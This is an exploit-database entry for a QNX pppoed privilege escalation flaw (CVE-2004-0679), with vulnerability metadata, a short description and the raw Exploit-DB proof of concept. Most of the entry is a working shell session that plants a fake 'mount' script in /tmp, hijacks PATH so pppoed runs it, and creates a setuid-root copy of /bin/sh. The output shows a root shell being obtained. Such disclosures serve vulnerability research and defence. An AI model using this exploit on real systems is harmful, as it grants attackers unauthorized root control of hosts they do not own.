QNX PPoEd Privilege Escalation Vulnerability

vendor:

PPoEd

by:

Unknown

7.5

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: PPoEd

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: CVE-2004-0679

CPE: a:qnx:pppoed

Metasploit:

Other Scripts:

Platforms Tested:

2004

QNX PPoEd Privilege Escalation Vulnerability

QNX PPoEd is prone to a vulnerability that allows an attacker to gain elevated privileges on a vulnerable host. The issue occurs due to a problem in the handling of paths to external executables used by PPPoEd. By exploiting this vulnerability, an attacker can execute arbitrary commands with elevated privileges.

Mitigation:

No known mitigation or remediation is available for this vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11105/info

QNX PPoEd is reported prone to a problem that exists in the handling of paths to external executables that are employed by PPPoEd. Because of this, an attacker may be able to gain elevated privileges on a host with a vulnerable version of PPPoEd installed.

$ cd /tmp
$ cat << _EOF_ > mount
#!/bin/sh
cp /bin/sh /tmp/rootshell
chown root /tmp/rootshell
chmod 4777 /tmp/rootshell
echo "Here comes your root shell"
_EOF_

$ chmod 755 mount
$ export PATH=/tmp:$PATH
$ /usr/sbin/pppoed
$ ls -la /tmp
-rwxr-xr-x 1 sandimas users 88 Aug 25 2004 mount
-rwsrwxrwx 1 root 100 153384 Jun 22 2001 /tmp/rootshell
$ /tmp/rootshell
Here comes your root shell
# uname -a
QNX sandimas 6.1.0 2001/06/25-15:31:48 edt x86pc x86
#